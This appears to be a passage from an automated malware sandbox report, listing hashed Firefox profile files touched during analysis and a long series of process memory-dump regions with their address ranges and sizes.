                                                                d4b9a84784661ab7d156e5db115a7143c309ad4610074e40d15f5e8a22591ed8d7f682b93a04843ade60c35aa8661cb8baa884eea41037948de0e67d19b65168

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\prefs-1.js

                                                                Filesize

                                                                8KB

                                                                MD5

                                                                20aba4afe15ebbbb91b57a584eeb282e

                                                                SHA1

                                                                0da57cbd509f896f8c11c82ec8d468d08afe1a6c

                                                                SHA256

                                                                01403af1206cf02777ac247b30fce1c6d47fa9da45a183aeab7ccd733738cb0f

                                                                SHA512

                                                                4157cf73b1eb7ac93751e65f6f8e119244e1f0619265a714d083d2193feb8fee8ebee2af90a99907d11ad5abb38fbca0d1bd50ab594ea50819478ffc016a95c9

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\prefs.js

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                7a17deaa239e7bfaf34aeb3a12173f2f

                                                                SHA1

                                                                a35a21df8206de1a66fc8b05b9b36f3bc7e152e1

                                                                SHA256

                                                                800217458b8688d778e200c5439ce45d45195a6f6ee36445b3c8972523b4fdda

                                                                SHA512

                                                                374a2755b864a3f3b0f7615c7992cd386988155fc387a56f28d5b0535135e7e4ff50b45dcdcc411b6a112df42a5ef6aed68758a4e2ffc53ea4b5db353225828b

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\prefs.js

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                053c0cd50b659480b51ba38cce117034

                                                                SHA1

                                                                bb80e311b37db2904467a6d4c8b8cb526e0d980f

                                                                SHA256

                                                                5912ebb2fd97c4b04bc9a54b01901b422bd004804dabc075d67ef0315f27b42b

                                                                SHA512

                                                                f24a8b4295a6a1d1ba55ec5b1be20562404289359de7b41d6152391dfc2377eade1c1d40048e8d95f3bc7badf7825d7ee3703d8a86d46ea202b081f8f4450abd

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\sessionstore-backups\recovery.baklz4

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                72d7f3fe261fb9c007b3baf3285a5eff

                                                                SHA1

                                                                90165cb34fe2164b14ba3e1422b63b8edc148c3e

                                                                SHA256

                                                                a1dd45f6e1e3c9aa22fe9c17388cab60599fd03b01a8d434984ef08c85fa2527

                                                                SHA512

                                                                f7579c7694169c4c0f3040fcf98466687761ccacda95f439a63bb1824ab156c8a5f804cf8ac12a7e9bf14e3ea0eb7165e28a528931518bd19c2b6e08259cdaf1

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ahkgvp67.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                Filesize

                                                                3.4MB

                                                                MD5

                                                                11f7d110fa6730d088810c615afd3726

                                                                SHA1

                                                                5ef63ce77abfaa55d0e43bf4e551cb5c0e101a14

                                                                SHA256

                                                                f8fcdbec02ec3b78e143f36b4aa641b2b35b1a4206e6e1f1f814f223d6f5455f

                                                                SHA512

                                                                3500804bf2f00ffbbe214c77adfe126b79ba2f45309c55a6a013bea85a503c600c1c7fe2d70a198b90b3d8102424b0e71fc69df9859e2cb5c8015e2cc510ef31

                                                              • memory/212-1549-0x0000024977E60000-0x0000024977ED6000-memory.dmp

                                                                Filesize

                                                                472KB

                                                              • memory/212-1541-0x0000024977D90000-0x0000024977DD4000-memory.dmp

                                                                Filesize

                                                                272KB

                                                              • memory/212-1540-0x00000249778C0000-0x00000249778E2000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/952-1511-0x00007FF6E17A0000-0x00007FF6E1B15000-memory.dmp

                                                                Filesize

                                                                3.5MB

                                                              • memory/1100-143-0x00000000001F0000-0x00000000006A2000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/1100-147-0x00000000001F0000-0x00000000006A2000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/1308-1614-0x00000203E98F0000-0x00000203E98F8000-memory.dmp

                                                                Filesize

                                                                32KB

                                                              • memory/1308-1611-0x00000203E9A50000-0x00000203E9A6C000-memory.dmp

                                                                Filesize

                                                                112KB

                                                              • memory/1308-1609-0x00000203E9990000-0x00000203E9A45000-memory.dmp

                                                                Filesize

                                                                724KB

                                                              • memory/1308-1610-0x00000203E9820000-0x00000203E982A000-memory.dmp

                                                                Filesize

                                                                40KB

                                                              • memory/1308-1608-0x00000203E98D0000-0x00000203E98EC000-memory.dmp

                                                                Filesize

                                                                112KB

                                                              • memory/1308-1612-0x00000203E9830000-0x00000203E983A000-memory.dmp

                                                                Filesize

                                                                40KB

                                                              • memory/1308-1616-0x00000203E9A90000-0x00000203E9A9A000-memory.dmp

                                                                Filesize

                                                                40KB

                                                              • memory/1308-1615-0x00000203E9900000-0x00000203E9906000-memory.dmp

                                                                Filesize

                                                                24KB

                                                              • memory/1308-1613-0x00000203E9A70000-0x00000203E9A8A000-memory.dmp

                                                                Filesize

                                                                104KB

                                                              • memory/1356-32-0x0000000000240000-0x00000000006E4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/1356-47-0x0000000000240000-0x00000000006E4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/1564-1399-0x0000000002F50000-0x0000000002F99000-memory.dmp

                                                                Filesize

                                                                292KB

                                                              • memory/1564-1402-0x00000000034B0000-0x0000000003519000-memory.dmp

                                                                Filesize

                                                                420KB

                                                              • memory/1564-1401-0x0000000003330000-0x0000000003333000-memory.dmp

                                                                Filesize

                                                                12KB

                                                              • memory/2056-1491-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-79-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-1643-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-1430-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-666-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-614-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-48-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-145-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-1530-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-103-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-1379-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-1475-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-1191-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-699-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2284-184-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2464-1469-0x0000000003EE0000-0x0000000003F46000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/2464-1468-0x0000000003EE0000-0x0000000003F46000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/2464-1470-0x0000000003EE0000-0x0000000003F46000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/2464-1471-0x0000000003EE0000-0x0000000003F46000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/2464-1472-0x0000000003EE0000-0x0000000003F46000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/2504-613-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/2504-612-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/2524-165-0x00007FF7B93C0000-0x00007FF7B9A4B000-memory.dmp

                                                                Filesize

                                                                6.5MB

                                                              • memory/2524-163-0x00007FF7B93C0000-0x00007FF7B9A4B000-memory.dmp

                                                                Filesize

                                                                6.5MB

                                                              • memory/2716-1661-0x0000000000400000-0x0000000000684000-memory.dmp

                                                                Filesize

                                                                2.5MB

                                                              • memory/3000-1642-0x0000000000670000-0x00000000008CD000-memory.dmp

                                                                Filesize

                                                                2.4MB

                                                              • memory/3056-187-0x0000000010000000-0x000000001001C000-memory.dmp

                                                                Filesize

                                                                112KB

                                                              • memory/3056-1359-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/3056-1100-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/3056-124-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/3056-128-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/3056-588-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/3056-166-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                Filesize

                                                                184KB

                                                              • memory/3544-225-0x00000000008C0000-0x0000000000D0C000-memory.dmp

                                                                Filesize

                                                                4.3MB

                                                              • memory/3544-218-0x00000000008C0000-0x0000000000D0C000-memory.dmp

                                                                Filesize

                                                                4.3MB

                                                              • memory/3544-634-0x00000000008C0000-0x0000000000D0C000-memory.dmp

                                                                Filesize

                                                                4.3MB

                                                              • memory/3544-638-0x00000000008C0000-0x0000000000D0C000-memory.dmp

                                                                Filesize

                                                                4.3MB

                                                              • memory/3544-226-0x00000000008C0000-0x0000000000D0C000-memory.dmp

                                                                Filesize

                                                                4.3MB

                                                              • memory/3804-1474-0x0000000000E30000-0x00000000012E4000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/3804-1467-0x0000000000E30000-0x00000000012E4000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/4276-1490-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/4276-1489-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/4504-1397-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/4504-1398-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/4588-1516-0x00000000001A0000-0x00000000008AE000-memory.dmp

                                                                Filesize

                                                                7.1MB

                                                              • memory/4588-1505-0x00000000001A0000-0x00000000008AE000-memory.dmp

                                                                Filesize

                                                                7.1MB

                                                              • memory/4816-121-0x0000000000400000-0x0000000000CCE000-memory.dmp

                                                                Filesize

                                                                8.8MB

                                                              • memory/4816-129-0x0000000000400000-0x0000000000CCE000-memory.dmp

                                                                Filesize

                                                                8.8MB

                                                              • memory/4832-647-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/4832-640-0x0000000000850000-0x0000000000CF4000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/4848-1413-0x0000000005D80000-0x0000000005DD6000-memory.dmp

                                                                Filesize

                                                                344KB

                                                              • memory/4848-1414-0x0000000005E10000-0x0000000005ED4000-memory.dmp

                                                                Filesize

                                                                784KB

                                                              • memory/4848-101-0x0000000000EB0000-0x000000000118A000-memory.dmp

                                                                Filesize

                                                                2.9MB

                                                              • memory/4848-697-0x0000000005960000-0x000000000597E000-memory.dmp

                                                                Filesize

                                                                120KB

                                                              • memory/4848-102-0x0000000005990000-0x0000000005A06000-memory.dmp

                                                                Filesize

                                                                472KB

                                                              • memory/5340-6-0x0000000005BF0000-0x0000000005C56000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/5340-2-0x0000000002C60000-0x0000000002C96000-memory.dmp

                                                                Filesize

                                                                216KB

                                                              • memory/5340-17-0x0000000006240000-0x000000000625E000-memory.dmp

                                                                Filesize

                                                                120KB

                                                              • memory/5340-3-0x00000000054A0000-0x0000000005AC8000-memory.dmp

                                                                Filesize

                                                                6.2MB

                                                              • memory/5340-5-0x0000000005B80000-0x0000000005BE6000-memory.dmp

                                                                Filesize

                                                                408KB

                                                              • memory/5340-16-0x0000000005E10000-0x0000000006164000-memory.dmp

                                                                Filesize

                                                                3.3MB

                                                              • memory/5340-4-0x00000000053C0000-0x00000000053E2000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/5340-24-0x00000000085B0000-0x0000000008B54000-memory.dmp

                                                                Filesize

                                                                5.6MB

                                                              • memory/5340-23-0x0000000007700000-0x0000000007722000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/5340-22-0x0000000007760000-0x00000000077F6000-memory.dmp

                                                                Filesize

                                                                600KB

                                                              • memory/5340-20-0x0000000006750000-0x000000000676A000-memory.dmp

                                                                Filesize

                                                                104KB

                                                              • memory/5340-19-0x0000000007980000-0x0000000007FFA000-memory.dmp

                                                                Filesize

                                                                6.5MB

                                                              • memory/5340-18-0x0000000006290000-0x00000000062DC000-memory.dmp

                                                                Filesize

                                                                304KB

                                                              • memory/5704-1442-0x0000000005CC0000-0x0000000006014000-memory.dmp

                                                                Filesize

                                                                3.3MB

                                                              • memory/5704-1452-0x00000000068E0000-0x000000000692C000-memory.dmp

                                                                Filesize

                                                                304KB

                                                              • memory/5916-1637-0x0000000000800000-0x0000000000801000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/5916-1638-0x0000000002A90000-0x0000000002AFB000-memory.dmp

                                                                Filesize

                                                                428KB

                                                              • memory/6032-1429-0x0000000000400000-0x00000000008AF000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/6032-1636-0x0000000000400000-0x00000000008AF000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/6032-1466-0x0000000000400000-0x00000000008AF000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/6032-1428-0x0000000000400000-0x00000000008AF000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/6032-1473-0x0000000000400000-0x00000000008AF000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/6032-1506-0x0000000000400000-0x00000000008AF000-memory.dmp

                                                                Filesize

                                                                4.7MB